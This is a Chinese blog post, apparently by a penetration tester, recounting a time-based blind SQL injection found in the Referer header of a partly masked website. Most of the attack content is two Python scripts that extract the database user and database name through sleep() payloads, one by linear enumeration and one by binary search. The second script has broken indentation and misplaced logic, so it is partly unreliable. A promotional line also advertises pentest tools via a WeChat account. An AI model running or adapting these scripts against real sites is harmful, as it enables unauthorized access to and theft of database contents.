一次巧合偶然的sql注入-seo优化_前端开发

一直以来，都想摆脱sqlmap的束缚，通过自定义脚本来完成

某月某天，挖盒子过程中，burpsuite扫出某个sqli，花了点时间测了下，确实有些搞头。

是一个from子查询payload，select*from(select sleep(10))a ,from会把后面的结果（在这里是子查询）当作单表来查询，

发包后，burpsuite返回包1154millls，存在sql注入，，不知道有多久没手工注入了，放sqlmap看能不能跑点数据出来

如图，referer注入设置level 3 ，time-base设置 technique T，跑不出注入点，欸，失望

明明有个注入点，就相当撕开了一个缺口，但迟迟找不到工具，一个人的孤独，一个人的渗透

找了位盆友，写了个枚举盲注，

# -*- coding: utf-8 -*-
import requests,time
url="https://aBC.com.cn/aa/15432aa.html"
result=""
for i in range(1,50):
	for j in range(32,128): 
		headers={"Referer":"https://aBC.com.cn/aa/15432aa.html/'+if(ascii(substr(user(),{},1))={},sleep(5),0)+'".format(i,j),
                 "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0",
                 "Host":"https://aBC.com.cn/aa/15432aa.html"   
                }
		st=time.time()
		requests.get(url,headers=headers)
		if time.time()-st >=5:
			result+=chr(j)
			print('database user name:',result)
			break
		else:
			pass

本以为可以直接跑数据，但拿到脚本后，频繁地爆format错误，耽搁了两天后，吧format放到referer:””.format这个格式可以正常跑，，

准备了两个探测payload: user()、database()

DBA权限

库名

到这里为止，，做得都是很肤浅的注入，

sql注入永远需要跑跑出字段和表才算一次比较合格的渗透，而上面这个脚本跑个库名就跑了5分钟，这里网上收集了某二分法，

关注公众号:hack之道，回复关键词：666，获取最新渗透教程和工具。

枚举的思路就是：

for i in range(1,50):

for j in range(32,128):

if(ascii(substr(user(),{i},1))={j},sleep(5),0) 通过枚举j的值，从32到128，直到枚举到128才进行下一轮

二分法的思路就是在j的区间做处理，减少j的取值，

low=32，high=128，mid=80，user(),{i},1通过比较是否小于80，具体缩小到某个小区间内。。

 # -*- coding:utf-8 -*-

    import requests,time
    from requests import exceptions

    url="https://aBC.com.cn/aa/15432aa.html"
    def main():
        result=""

        for i in range(1, 20):
            low = 32
            high = 128
            #1111
            while low < high:
                mid = int((low + high) / 2)
                #content = "user()"
                #sql = "https://https://aBC.com.cn/aa/'+if((ascii(substr(({content}),{i},1))<{mid}),sleep(5),0)+'"
                
                headers={"Referer":"https://https://aBC.com.cn/aa/15432aa.html/'+if(ascii(substr(user(),{},1))<{},sleep(5),0)+'".format(i,mid),
                     "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0",
                     "Host":"https://aBC.com.cn/aa/"   
                    }
                st=time.time()    
                requests.get(url,headers=headers)
                #2222
                if time.time()-st >5:
                    high = mid
                else:
                    low = mid + 1
                print("low value {} and high value {}".format(low,high))
                #3333
           #跑出结果后，值的处理
           if low == high == 32:
            print("[*] Result is: {}".format(result))
            break
            result += chr(int((high + low - 1) / 2))
            print("database user :{}".format(result))
    if __name__ == '__main__':
        main()